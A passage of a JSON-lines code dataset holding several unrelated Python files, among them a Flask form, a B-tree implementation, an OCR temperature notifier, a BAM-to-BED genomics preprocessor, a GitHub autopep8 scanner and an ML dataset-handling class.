before.lstrip('\\n'),func.lstrip('\\n'),after.lstrip('\\n'),program_text\n\t\n\t#string,list[string] -> string,string\n\t@staticmethod\n\tdef __find_func(header,rest):\n\t\ttab_str = \"{0}\\t\".format(Function.__calc_indent(header))\n\n\t\tfunc = \"{0}\\n\".format(header)\n\t\tline_num = 0\n\t\tfor line in rest:\n\t\t\tif line.startswith(tab_str) or line.startswith(\"#\"):\n\t\t\t\tfunc += \"{0}\\n\".format(line)\n\t\t\t\tline_num += 1\n\t\t\telse:\n\t\t\t\tbreak\n\t\tif func[-1]=='\\n':\n\t\t\tfunc = func[:-1]\n\t\t\n\t\tafter = \"\"\n\t\tfor line in rest[line_num:]:\n\t\t\tafter += \"{0}\\n\".format(line)\n\t\tif after[-1]=='\\n':\n\t\t\tafter = after[:-1]\n\n\t\treturn func,after\n\t\n\t#string -> int\n\t@staticmethod\n\tdef __calc_indent(line):\n\t\ttab_str = \"\"\n\t\tfor char in line:\n\t\t\tif char!='\\t':\n\t\t\t\treturn tab_str\n\t\t\ttab_str += '\\t'\n\t\treturn tab_str\n\n#file -> None\ndef detect_types(program):\n\tfunction_list = []\n\torig_program = program\n\toutside_func = \"\"\n\n\twhile Function.has_next(program):\n\t\tbefore,func,after,program = Function.next_func(program)\n\t\tif before!='':\n\t\t\toutside_func += before\n\t\tprogram = after + program\n\t\tfunction = Function(func.splitlines())\n\t\tfunction_list.append(function)\n\toutside_func += after\n\n\ttype_analysis.main(orig_program,function_list,outside_func)\n\n#None -> list[file]\ndef init():\n\targs = parser.parse_args()\n\tprograms = args.programs\n\treturn programs\n\nif __name__==\"__main__\":\n\t#program_list = init()\n\tprograms = [open(\"type_test.py\",'r')]\n\t\n\tfor program in programs:\n\t\tdetect_types(program.read())\n","sub_path":"archive/Python/type_sig.py","file_name":"type_sig.py","file_ext":"py","file_size_in_byte":5218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"612376514","text":"from flask_wtf import FlaskForm\r\nfrom wtforms.validators import InputRequired, Length, Regexp, Email, ValidationError\r\nfrom wtforms import StringField, TextAreaField, SubmitField\r\nfrom studentarchiveapp.models import UsersModel\r\n\r\n\r\nclass ContactForm(FlaskForm):\r\n name = StringField('Name', validators=[Length(min=3, max=20), InputRequired(),\r\n Regexp('^[a-z A-Z]+$', message='Invalid characters in name')])\r\n email = StringField('Email Address', validators=[Email(), InputRequired()])\r\n comment = TextAreaField('Comment', validators=[Length(min=5, max=100), InputRequired()])\r\n submit = SubmitField('Send')\r\n\r\n def validate_email(self, email):\r\n user = UsersModel.query.filter_by(email=email.data).first()\r\n if user is None:\r\n raise ValidationError('Please email doesn\\'t exist. You have to be a user to comment ')\r\n","sub_path":"studentarchiveapp/home/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"262568044","text":"import urllib\nimport PIL\nimport Image\nimport ImageFilter\nimport pytesseract\nimport os\nfrom telegrampush import push\n# Source\nurl = 'http://www.bgc-jena.mpg.de/wetter/Chart_T.gif'\n\n\n# Download the image from the source\n\nurllib.urlretrieve(url, 'tmp.gif')\nprint (\"downloading\")\n\n# Crop the image\nimg = PIL.Image.open(\"tmp.gif\")\nwidth = img.size[0]\nheight = img.size[1]\nprint(width,height)\nimg = img.crop(\n (\n 278,\n 1,\n 518,\n 29\n )\n)\nimg = img.convert(mode=\"1\")\nimg = img.resize((600,60))\n# OCR the image\n#img = img.resize((200,80))\n#img = img.filter(ImageFilter.SMOOTH)\n#img = img.convert(mode=\"1\")\nimg = img.save(\"img.png\")\nimg = PIL.Image.open(\"img.png\")\nimg.load()\ntmp = pytesseract.image_to_string(img,config='--psm 3 -c tessedit_char_whitelist=0123456789-\".C')\nprint (tmp)\n\n\npush(\"Temperature outside: %s .\" % tmp)\nos.system('rm tmp.gif')\nos.system('rm img.png')\n","sub_path":"ltemp.py","file_name":"ltemp.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"608244053","text":"#!/usr/bin/python\n# -*- coding:utf8 -*-\n\nimport numpy as np\nfrom scipy import misc\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\n# ================================================================\n# 对图片进行内容的预处理\n# ================================================================\ndef PreprocessContentImage(path, long_edge):\n img = misc.imread(path)\n print(img.shape)\n logging.info(\"\\t\\tload the content image, size = %s\", img.shape[:2])\n factor = float(long_edge) / max(img.shape[:2])\n new_size = (int(img.shape[0] * factor), int(img.shape[1] * factor))\n resized_img = misc.imresize(img, new_size)\n # sample = np.asarray(resized_img) * 256\n # swap axes to make image from (224, 224, 3) to (3, 224, 224)\n sample=np.transpose(resized_img,[2,0,1])\n sample=np.array(sample,dtype=np.float)\n # sub mean\n sample[0, :] -= 123.68\n sample[1, :] -= 116.779\n sample[2, :] -= 103.939\n logging.info(\"\\t\\tresize the content image to %s\", new_size)\n return np.resize(sample, (1, 3, sample.shape[1], sample.shape[2]))\n\n# ================================================================\n# 对风格图片进行预处理\n# ================================================================\ndef PreprocessStyleImage(path, shape):\n img = misc.imread(path)\n resized_img = misc.imresize(img, (shape[2], shape[3]))\n sample=np.transpose(resized_img,[2,0,1])\n sample=np.array(sample,dtype=np.float)\n\n sample[0, :] -= 123.68\n sample[1, :] -= 116.779\n sample[2, :] -= 103.939\n return np.resize(sample, (1, 3, sample.shape[1], sample.shape[2]))\n\n# ================================================================\n# 保存转换后的图片\n# ================================================================\ndef SaveImage(img, filename):\n logging.info('save output to %s', filename)\n img = np.reshape(img, (3, img.shape[2], img.shape[3]))\n img[0, :] += 123.68\n img[1, :] += 116.779\n img[2, :] += 103.939\n img=np.transpose(img,[1,2,0])\n img = np.clip(img, 0, 255)\n img=img.astype('uint8')\n\n misc.imsave(filename, img)\n","sub_path":"Computer_vision/neurall_style/image_process.py","file_name":"image_process.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"282949343","text":"def render(w,h):\n for y in range(h):\n for x in range(w):\n if x==0 or x==w-1 or y==0 or y==h-1:\n print(\"#\",end=\"\")\n else:\n print(\" \",end=\"\")\n print()\n\nrender(10,10)\n\n","sub_path":"ppf-ex09/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"263076062","text":"from django.conf.urls import url\nimport views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n\n #API\n url(r'^api/login$', views.login, name='login'),\n url(r'^api/logout$', views.logout, name='logout'),\n url(r'^api/events_list/?$', views.get_events_list, name='events_list'),\n url(r'^api/event/?$', views.get_event_details, name='events_list'),\n url(r'^api/search_event/?$', views.search_event, name='search_event'),\n url(r'^api/join_event$', views.join_event, name='join_event'),\n url(r'^api/reaction$', views.reaction, name='reaction'),\n url(r'^api/comment$', views.comment, name='comment'),\n url(r'^api/get_participant/?$', views.get_participant, name='get_participant'),\n url(r'^api/get_reaction/?$', views.get_reaction, name='get_reaction'),\n url(r'^api/get_comment/?$', views.get_comment, name='get_comment'),\n\n #API admin\n url(r'^api/admin/login$', views.admin_login, name='admin_login'),\n url(r'^api/admin/upload$', views.admin_upload, name='admin_upload')\n]\n","sub_path":"social_sharing/social_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"542388470","text":"# coding:utf-8\nfrom distutils.core import setup\n\n# 在setup函数前插入语句import py2exe\nimport py2exe\n\nincludes = [\"encodings\", \"encodings.*\"]\noptions = {\n \"pu2exe\":\n {\n \"includes\": includes\n }}\n\nsetup(\n # 1、创建控制台.exe程序\n console=[\"helloworld.py\"]\n\n # 创建图形用户界面\n # windows=[\"helloworld.py\"]\n)\n'''\n1、创建控制台.exe程序\npy2exe一次能够创建多个exe文件,你需要将这些脚本文件的列表传递给console或windows的关键字参数。如果你有几个相关联的脚本,那么这是很有用的。\n\n2、创建图形用户界面\n如果你要创建一个图形用户界面的程序,那么你需要console=[\"myscript.py\"]替换为windows=[\"myscript.py\"]。\n注意windows的用法,他可以代替console, 如果你要集成 wxpython 的时候,一定会用的 \n'''\n","sub_path":"PyModules/py2exe_/DemoSetup.py","file_name":"DemoSetup.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"227588169","text":"from CharacterGenerator import font_source\nfrom CharacterSource import NumericCharacterSource, AlphaNumericCharacterSource\nfrom PIL import Image, ImageDraw, ImageFont, ImageFilter, ImageTransform, ImageChops\nfrom Utils import mkdir\nimport random\nimport numpy as np\nimport uuid\nimport argparse\nimport sys, errno, os\nimport pickle\nimport Drawing\nimport Utils\n\nnum_char_columns = 2\nnum_char_rows = 32\ndebug = True\nchar_source = NumericCharacterSource()\n\ndef create_char_sequence(image_width = 128, image_height = 32, options={}):\n canvas_width = image_width * 2\n canvas_height = image_height * 2\n font = font_source.random_font(options)\n min_color_delta = options.get('min_color_delta', 32)\n text_color = random.randint(0,255)\n background_color = Drawing.random_background_color(text_color, min_color_delta=min_color_delta)\n text = char_source.random_char()\n\n image = Drawing.create_char_background(canvas_width, canvas_height, text_color, background_color, min_color_delta, options=options)\n char_image = Image.new('RGBA', (canvas_width, canvas_height), (0,0,0,0))\n\n text = \"\"\n\n for i in range(0,random.randint(1,10)):\n text += char_source.random_char()\n\n (w,h) = font.calc_text_size(text)\n x = 0.5 * (canvas_width - w)\n y = 0.5 * (canvas_height - h)\n margin = random.random() * 16\n x += (random.random() - 0.5) * 0.5 * margin\n y += (random.random() - 0.5) * (image_height - h)\n\n draw = ImageDraw.Draw(char_image)\n Drawing.draw_text_with_random_outline(draw, x, y, text, font, text_color)\n\n if random.random() > 0.5:\n image = Drawing.add_shadow(char_image, image, x, y, font, text, text_color)\n\n char_image = Image.alpha_composite(image, char_image)\n char_image = Drawing.random_rotate(char_image, options)\n# char_image = perspective_transform(char_image)\n char_image = Drawing.crop(char_image, w + margin, rescale=False)\n char_image = Drawing.random_blur(char_image, options)\n char_image = Drawing.add_noise(char_image, options)\n return char_image, text\n\n\ndef create_segmentation_examples(data_dir, n):\n image_width = 256\n image_height = 32\n options={'min_color_delta':16.0, 'min_blur':0.5, 'max_blur':1.5, 'max_rotation':2.0, 'min_noise':4, 'max_noise':4, 'add_background_lines':False}\n options['full_alphabet'] = False\n\n full_alphabet = options.get('full_alphabet', False)\n if full_alphabet:\n char_source = AlphaNumericCharacterSource()\n\n labels = {}\n mkdir(data_dir)\n for i in range(n):\n Utils.progress_bar(i+1, n)\n id = str(uuid.uuid4())\n char_image, label = create_char_sequence(image_width, image_height, options)\n labels[id] = label\n char_image.save(data_dir + \"/\" + id + \".png\")\n file = open(data_dir + '/' + 'labels.pickle', 'wb')\n print (\"Writing labels.pickle ...\")\n pickle.dump(labels, file, -1)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', action=\"store\", dest=\"n\", type=int, default=1024)\n parser.add_argument('--directory', action='store', dest='data_dir', default='data')\n parser.add_argument(\"--save\", help=\"save image as png along with a pickle of the labels\", action=\"store_true\")\n args = parser.parse_args()\n create_segmentation_examples(args.data_dir, args.n)\n","sub_path":"CharacterSequenceGenerator.py","file_name":"CharacterSequenceGenerator.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"77485212","text":"# coding:utf-8\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n# class Article\nclass Article:\n\n def __init__(self, id, url, title, author, time, clstext, modtext, annotext):\n self.id = id\n self.url = url\n self.title = title\n self.author = author\n self.time = time\n self.clstext = clstext\n self.modtext = modtext\n self.annotext = annotext\n\n def set_clsparas(self, clsparas):\n self.clsparas = clsparas\n\n def set_modparas(self, modparas):\n self.modparas = modparas\n\n \"\"\"\n set annotations of the article\n annotation: {paragraph_position:\n {sentence_position:\n [[token_pos,token,note],...]\n }}\n \"\"\"\n def set_annotations(self, annotations):\n self.annotations = annotations\n\n# class Paragraph\nclass Paragraph:\n\n def __init__(self, text, sentences):\n self.text = text\n self.sentences = sentences\n\n def set_sentences(self, sentences):\n self.sentences = sentences\n\n# class Annotation\nclass Annotation:\n token = None\n note = None\n p_pos = None # at which paragraph, specially, \"title\" at title; \"author\" at author.\n s_pos = None # at which sentence.\n t_pos = None # at which token.\n\n def __init__(self, token, note, p_pos, s_pos, t_pos):\n self.token = token\n self.note = note\n self.p_pos = p_pos\n self.s_pos = s_pos\n self.t_pos = t_pos\n","sub_path":"align/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"183737937","text":"class Node:\n def __init__(self):\n self.values = []\n self.next = []\n self.parent = None\n\n\nclass BTree:\n def __init__(self, t):\n self.t = t\n self.root = None\n\n def devastateNode(self, node: Node):\n mid = (3*self.t - 2)//2 - 1\n if node == self.root:\n left = Node()\n right = Node()\n left.values = node.values[:mid]\n left.next = node.next[:mid+1]\n left.parent = node\n for i in left.next:\n i.parent = left\n right.values = node.values[mid+1:]\n right.next = node.next[mid+1:]\n right.parent = node\n for i in right.next:\n i.parent = right\n node.values = [node.values[mid]]\n node.next = [left, right]\n else:\n right = Node()\n right.values = node.values[mid+1:]\n right.next = node.next[mid+1:]\n right.parent = node.parent\n val = node.values[mid]\n node.values = node.values[:mid]\n node.next = node.next[:mid+1]\n for i in range(len(node.parent.values) + 1):\n if i == len(node.parent.values) or val < node.parent.values[i]:\n node.parent.values.insert(i, val)\n node.parent.next.insert(i+1, right)\n break\n\n def insert(self, val, node, allowdevastation):\n if allowdevastation and len(node.values) == 2 * self.t - 1:\n self.devastateNode(node)\n if node.parent is not None:\n self.insert(val, node.parent, False)\n else:\n self.insert(val, node, False)\n elif len(node.next) == 0:\n for i in range(len(node.values) + 1):\n if i == len(node.values) or val < node.values[i]:\n node.values.insert(i, val)\n break\n else:\n for i in range(len(node.values) + 1):\n if i == len(node.values) or val < node.values[i]:\n self.insert(val, node.next[i], True)\n break\n\n def printChildrenFirst(self):\n if self.root is None:\n print(\"Drzewo puste\")\n return\n children = [tree.root]\n while children:\n newchildren = []\n for i in children:\n print(\"|\", end=\" \")\n for j in i.values:\n print(j, end=\" \")\n for j in i.next:\n newchildren.append(j)\n print(\"|\")\n children = newchildren\n\n\ndef printDepthFirst(tree: Node):\n if tree is None:\n print(\"Drzewo puste\")\n return\n printDepthFirst(tree.left)\n print(tree.value)\n printDepthFirst(tree.right)\n\n\ndef insert(tree: Node, val):\n if tree is None:\n tree = Node()\n tree.value = val\n elif val < tree.value:\n tree.left = insert(tree.left, val)\n elif val > tree.value:\n tree.right = insert(tree.right, val)\n return tree\n\n\ndef insert2(tree: Node, val):\n if tree.value is None:\n tree.value = val\n elif val < tree.value:\n tree.left = tree.left or Node()\n insert(tree.left, val)\n elif val > tree.value:\n tree.right = tree.right or Node()\n insert(tree.right, val)\n\n\ndef delete(tree: Node, val, parent):\n res = tree\n while tree is not None and tree.value != val:\n if val < tree.value:\n parent = tree\n tree = tree.left\n elif val > tree.value:\n parent = tree\n tree = tree.right\n\n if tree is not None:\n if tree.left is None and tree.right is None:\n if parent is None:\n return None\n if parent.left == tree:\n parent.left = None\n else:\n parent.right = None\n elif tree.left is not None and tree.right is not None:\n child = tree.right\n childparent = tree\n while child.left is not None:\n childparent = child\n child = child.left\n tree.value = child.value\n delete(child, child.value, childparent)\n else:\n if parent is None:\n return tree.left or tree.right\n if tree == parent.left:\n parent.left = tree.left or tree.right\n else:\n parent.right = tree.left or tree.right\n\n return res\n\n\ntree = BTree(2)\ntree.root = Node()\ntree.root.values = [2, 10]\nleft = Node()\nleft.values = [0, 1]\nleft.parent = tree.root\nmid = Node()\nmid.values = [5, 8]\nmid.parent = tree.root\nright = Node()\nright.values = [15, 16, 17]\nright.parent = tree.root\ntree.root.next = [left, mid, right]\n\ntree.printChildrenFirst()\ntree.insert(16.5, tree.root, True)\ntree.printChildrenFirst()\ntree.insert(17.5, tree.root, True)\ntree.printChildrenFirst()\ntree.insert(18.5, tree.root, True)\ntree.printChildrenFirst()\ntree.insert(9, tree.root, True)\ntree.printChildrenFirst()\ntree.insert(9.5, tree.root, True)\ntree.printChildrenFirst()\n\n\n","sub_path":"btree.py","file_name":"btree.py","file_ext":"py","file_size_in_byte":5074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"584189823","text":"#!/usr/bin/env python\n\n\"\"\"\nPre-processing including following steps:\n1) sorting by read names\n2) remove duplicates\n3) convert to bed file\nCreated by Rongxin Fang\n\"\"\"\nimport sys\nimport gzip\nimport pysam\nimport os\nimport collections \n\ndef is_sorted_queryname(header):\n \"\"\"\n Check if bam fiel is sorted by read name.\n \"\"\"\n if(\"HD\" in header):\n if(\"SO\" in header[\"HD\"]):\n if(header[\"HD\"][\"SO\"] == \"queryname\"):\n return True\n return False\n \ndef main():\n\n barcode_uniq = collections.defaultdict(lambda : 0)\n barcode_total = collections.defaultdict(lambda : 0)\n\n from argparse import ArgumentParser\n # parameters\n \n parser = ArgumentParser(description='snATAC-seq preprocessing')\n parser.add_argument('-i', '--input', help='input bam file', required=True)\n parser.add_argument('-o', '--output', help='output bed/bed.gz file', required=True)\n parser.add_argument('-m', '--mapq', help='min mappability score [30]', required=True)\n parser.add_argument('-t', '--threads', help='number of threads [3]', required=True)\n parser.add_argument('-f', '--flen', help='maximum fragment length [2000]', required=True)\n parser.add_argument('-e', '--elen', help='increase -e base pairs in each direction [75]', required=True)\n \n options = parser.parse_args()\n\n num_threads = 1\n min_mapq = 30\n max_flen = 2000\n exlen = 75 \n # input parsing\n input_bam = options.input\n output_bed = options.output\n num_threads = int(options.threads)\n min_mapq = int(options.mapq)\n max_flen = int(options.flen)\n exlen = int(options.elen)\n \n \n if output_bed.endswith(\".gz\"):\n fout = gzip.open(output_bed, \"wb\")\n else:\n fout = open(output_bed, \"w\")\n \n # start reading the bam\n samfile = pysam.AlignmentFile(input_bam, \"rb\")\n\n\n genome_size = dict([[item[\"SN\"], int(item[\"LN\"])] for item in samfile.header[\"SQ\"]])\n\n pre_barcode = \"\"\n cur_list = []\n \n for read in samfile:\n cur_barcode = read.qname.split(\":\")[0]\n rname = str(read.reference_name)\n rstart = str(max(1, read.reference_end -5 - exlen if read.is_reverse else read.reference_start + 4 - exlen))\n rend = str(min(genome_size[rname], read.reference_end - 5 + exlen if read.is_reverse else read.reference_start +4 + exlen))\n #rstart = str(max(1, read.reference_start - exlen if read.is_reverse else read.reference_start + 4 - exlen))\n #rend = str(min(genome_size[rname], read.reference_end - 5 + exlen if read.is_reverse else read.reference_end + exlen))\n if(pre_barcode == cur_barcode):\n cur_list.append((rname, rstart, rend, cur_barcode))\n \n barcode_total[cur_barcode] += 1\n else:\n for item in set(cur_list):\n barcode_uniq[item[3]] += 1\n fout.write(\"\\t\".join(list(item))+\"\\n\")\n pre_barcode = cur_barcode\n cur_list = [(rname, rstart, rend, cur_barcode)]\n barcode_total[cur_barcode] += 1\n \n # don't forget about the last barocode\n for item in set(cur_list):\n barcode_uniq[item[3]] += 1\n fout.write(\"\\t\".join(list(item))+\"\\n\")\n\n samfile.close()\n \n # write down the qc file\n with open(output_bed+\".qc\", \"w\") as fout:\n for barcode in barcode_total:\n fout.write(\"\\t\".join([barcode, str(barcode_uniq[barcode]), str(1 - float(barcode_uniq[barcode])/barcode_total[barcode])]) + \"\\n\") \n \nif __name__ == '__main__':\n main()\n","sub_path":"scAR_process/snap_prebed.py","file_name":"snap_prebed.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"428095025","text":"from github import Github\nimport autopep8\nfrom datetime import datetime\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\nnumber = 0\n\ndef main():\n token = os.getenv('GIT_HUB_TOKEN')\n g = Github(token)\n username = os.getenv('GIT_HUB_USERNAME')\n\n for repo in g.search_repositories(\"language:Python pugs pushed:>2020-08-28\"):\n now = datetime.now()\n\n current_time = now.strftime(\"%H:%M:%S\")\n print(\"Current Time =\", current_time)\n print(g.rate_limiting)\n print(g.rate_limiting_resettime)\n analyze_repo(repo)\n\ndef analyze_repo(repo):\n global number\n for file_text in get_files_text(repo, \".py\"):\n origin = file_text.decoded_content.decode()\n new = autopep8.fix_code(origin)\n if new != origin:\n print(\"COMMIT fix to file\", file_text.path)\n\ndef commit_change(repo, file, new_data, commit):\n print(repo.url)\n print(\"file.path\", file.path)\n print(\"file.sha\", file.sha)\n repo.update_file(\"/\" + file.path, commit, new_data, file.sha)\n\n\ndef get_files_text(repo, end):\n end_len = len(end)\n contents = repo.get_contents(\"\")\n while contents:\n file_content = contents.pop(0)\n if file_content.type == \"dir\":\n contents.extend(repo.get_contents(file_content.path))\n else:\n if len(file_content.path) > end_len:\n file_end = file_content.path[len(file_content.path) - end_len:]\n if file_end == end:\n yield file_content\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"46700801","text":"\nimport numpy as np\nimport random\n\nfrom .datasets_base import DatasetsBase, InOut, DATASET_OPS\nfrom ..core.registry import DATASET_AUGMENT, DATASET_CREATE, DATASET_INOUT, DATASET_LOAD, DATASET_PREPROCESS, DATASET_SAVE, DATASET_SPLIT\n\n\nclass Datasets(DatasetsBase):\n \"\"\"\n Datasets class cotaining trainig, test and validation datasets\n self.dataset : Original dataset\n self.dataset_test : Test dataset (split from self.dataset)\n self.dataset_test_xy : Test dataset, inputs and outputs\n self.dataset_train : Train dataset (split of self.dataset_\n self.dataset_train_xy : Train dataset inputs and outputs\n self.dataset_validate : Valiation dataset (split from self.dataset)\n self.dataset_validate_xy : Validation dataset inputs and outputs\n \"\"\"\n def __init__(self, config, set_config=True):\n super().__init__(config, set_config)\n\n def augment(self):\n ret = self.invoke_augment()\n if ret:\n return ret\n # We provide a default implementation\n return self.default_augment()\n\n def __call__(self):\n \"\"\"\n Load (or create) dataset, then augment, proprocess and split\n Save at each step for faster processing / consistency\n \"\"\"\n if not self.enable:\n self._debug(f\"Dataset disabled, skipping (enable='{self.enable}')\")\n return True\n self._debug(\"Start\")\n self.should_save = False\n if self.load():\n self._debug(f\"Dataset loaded. {self.memory()}\")\n elif self.create():\n self._debug(f\"Dataset created. {self.memory()}\")\n self.should_save = True\n else:\n self._debug(\"Could not load or create dataset\")\n return False\n # Perform operations\n for op in self.operations:\n if self.do(op):\n self.should_save = True\n # Get inputs / outputs\n self.in_outs()\n # Save\n if self.should_save:\n self._debug(\"Should save = {self.should_save}, saving dataset\")\n self.save()\n self._debug(f\"End. {self.memory()}\")\n return True\n\n def _config_sanity_check(self):\n \"\"\"\n Check parameters from config.\n Return True on success, False if there are errors\n \"\"\"\n if self.dataset_path is None:\n self._fatal_error(\"Missing 'dataset_path' parameters in config file '{self.config.config_file}', section {CONFIG_DATASET}\")\n if self.dataset_name is None:\n self._fatal_error(\"Missing 'dataset_name' parameters in config file '{self.config.config_file}', section {CONFIG_DATASET}\")\n return True\n\n def create(self):\n return self.invoke_create()\n\n def default_augment(self):\n return False\n\n def default_in_out(self, ds, name):\n \"\"\" Default method for getting inputs / outputs \"\"\"\n if self.is_use_all_inputs:\n # Use all inputs, no output (e.g. unsupervised learning)\n return InOut(ds, None)\n self._fatal_error(\"Default 'dataset_inout' method not defined\")\n return InOut(None, None)\n\n def default_load(self):\n \"\"\" Load dataset from pickle file. Return new dataset \"\"\"\n if self.do_not_load_pickle:\n return False\n file_name = self.get_file()\n self._debug(f\"Load dataset from file '{file_name}'\")\n ds = self._load_pickle(file_name, 'Load dataset')\n if ds:\n # Copy data from loaded dataset\n self.dataset = ds.dataset\n self.dataset_test = ds.dataset_test\n self.dataset_train = ds.dataset_train\n self.dataset_validate = ds.dataset_validate\n self.operations = ds.operations\n self.operations_done = ds.operations_done\n self._debug(f\"Load dataset done, file '{file_name}'\")\n return ds is not None\n\n def default_preprocess(self):\n \" Default implementation for '@dataset_preprocess' \"\n self._debug(f\"Default dataset preprocess not defined, skipping\")\n return False\n\n def default_save(self):\n \"\"\" Default implementation of '@dataset_save' \"\"\"\n return self._save_pickle(self.get_file(), 'Save dataset', self)\n\n def default_split(self):\n \"\"\"\n Default implementation for '@dataset_split'\n Assumptions:\n 1) self.dataset object is iterable\n 2) Parameter 'split_test' and 'split_validate' are defined such that\n 2.a) split_test >= 0\n 2.b) split_validate >= 0\n 2.c) split_test + split_validate < 1\n It returns three list of 'samples': train, validate, test\n \"\"\"\n # Is datasets iterable?\n self._debug(f\"Using default split method\")\n # Are split parameters defined?\n kwargs = self.config.get_parameters_functions(DATASET_SPLIT)\n for key in ['split_test', 'split_validate']:\n if key not in kwargs:\n self._debug(f\"Cannot run default _split: Parameter '{key}' not in defined for section '{DATASET_SPLIT}' in YAML file\")\n return False\n split_test, split_validate = kwargs['split_test'], kwargs['split_validate']\n # Split dataset into three lists\n idx_train, idx_validate, idx_test = list(), list(), list()\n len_tot = len(self.dataset)\n for idx in range(len_tot):\n r = random.random()\n if r <= split_validate:\n idx_validate.append(idx)\n elif r <= split_test + split_validate:\n idx_test.append(idx)\n else:\n idx_train.append(idx)\n self._info(f\"Splitting dataset: train={len(idx_train) / len_tot}, validate={len(idx_validate) / len_tot}, test={len(idx_test) / len_tot}. {self.memory()}\")\n idx_train, idx_validate, idx_test = np.array(idx_train), np.array(idx_validate), np.array(idx_test)\n return self.split_idx(idx_train, idx_validate, idx_test)\n\n def do(self, op):\n \"\"\"\n Perform an abstract operation on a dataset\n Return True if the dataset operation has been applied (i.e. the dataset changed)\n \"\"\"\n self._debug(f\"Dataset operation '{op}': Start\")\n ok = False\n if op in self.operations_done:\n self._debug(f\"Operation '{op}' has been done. Skipping\")\n return False\n if op == DATASET_AUGMENT:\n ok = self.augment()\n elif op == DATASET_CREATE:\n ok = self.create()\n elif op == DATASET_PREPROCESS:\n ok = self.preprocess()\n elif op == DATASET_SPLIT:\n ok = self.split()\n elif op == DATASET_INOUT:\n ok = self.in_outs()\n else:\n raise ValueError(f\"Unknown dataset operation '{op}'\")\n if ok:\n self.operations_done.add(op)\n self._debug(f\"Dataset operation '{op}': End, ok={ok}. {self.memory()}\")\n return ok\n\n def __getitem__(self, key):\n return self.dataset[key]\n\n def _in_out(self, ds, name):\n \"\"\"\n Split dataset inputs and outputs from dataset 'ds'\n Returns an InOut named tuple\n \"\"\"\n if ds is None:\n return InOut(None, None)\n self._debug(f\"Get inputs & outputs from dataset '{name}'\")\n (invoked, ret) = self.invoke_in_out(ds, name)\n if invoked:\n self._debug(f\"In/Out {name} invoked: {self.memory()}\")\n return ret\n # We provide a default implementation for 'in_out'\n if self.is_use_default_in_out:\n return self.default_in_out(ds, name)\n self._fatal_error(\"Unable to get inputs & output from dataset. No function registered\")\n return InOut(None, None)\n\n def in_outs(self, all=True):\n \"\"\" Get inputs & outputs for all datasets \"\"\"\n if all:\n self.dataset_xy = self._in_out(self.dataset, 'all')\n self.dataset_test_xy = self._in_out(self.dataset_test, 'test')\n self.dataset_train_xy = self._in_out(self.dataset_train, 'train')\n self.dataset_validate_xy = self._in_out(self.dataset_validate, 'validate')\n self._debug(f\"In/Out finshed: {self.memory()}\")\n return True\n\n def invoke_augment(self):\n \" Invoke user defined function for '@dataset_augment' \"\n args = [self.dataset]\n (invoked, ret) = self.config.invoke(DATASET_AUGMENT, 'Augment', args)\n if invoked:\n self.dataset = ret\n return invoked\n\n def invoke_create(self):\n \" Invoke user defined function for '@dataset_create' \"\n (invoked, ret) = self.config.invoke(DATASET_CREATE, 'Create dataset')\n if invoked:\n self.dataset = ret\n return invoked\n\n def invoke_in_out(self, ds, name):\n \" Invoke user defined function for '@dataset_inout' \"\n args = [ds]\n (invoked, ret) = self.config.invoke(DATASET_INOUT, f\"InOut {name}\", args)\n if invoked:\n if ret is None or len(ret) != 2:\n self._fatal_error(f\"User defined function '{DATASET_INOUT}' should return a tuple, but it returned '{ret}'\")\n x, y = ret\n return True, InOut(x, y)\n return False, InOut(None, None)\n\n def invoke_load(self):\n \" Invoke user defined function fo '@dataset_load' \"\n (invoked, ret) = self.config.invoke(DATASET_LOAD, 'Load dataset')\n if invoked:\n self.dataset = ret\n return invoked\n\n def invoke_preprocess(self):\n \" Invoke user defined function for '@dataset_preprocess' \"\n args = [self.dataset]\n (invoked, ret) = self.config.invoke(DATASET_PREPROCESS, 'Preprocess', args)\n if invoked:\n self.dataset = ret\n return invoked\n\n def invoke_save(self):\n \" Invoke user defined function for '@dataset_save' \"\n args = [self.dataset, self.dataset_train, self.dataset_test, self.dataset_validate]\n (invoked, ret) = self.config.invoke(DATASET_SAVE, 'Save dataset', args)\n return invoked\n\n def invoke_split(self):\n \" Invoke user defined function for '@dataset_split' \"\n args = [self.dataset]\n (invoked, ret) = self.config.invoke(DATASET_SPLIT, 'Split dataset', args)\n if invoked:\n # The returned dataset is a tuple, unpack it\n self.dataset_train, self.dataset_validate, self.dataset_test = ret\n return invoked\n\n def __len__(self):\n return 0 if self.dataset is None else len(self.dataset)\n\n def load(self):\n \"\"\" Try to load dataset, first from pickle otherwise from user defined 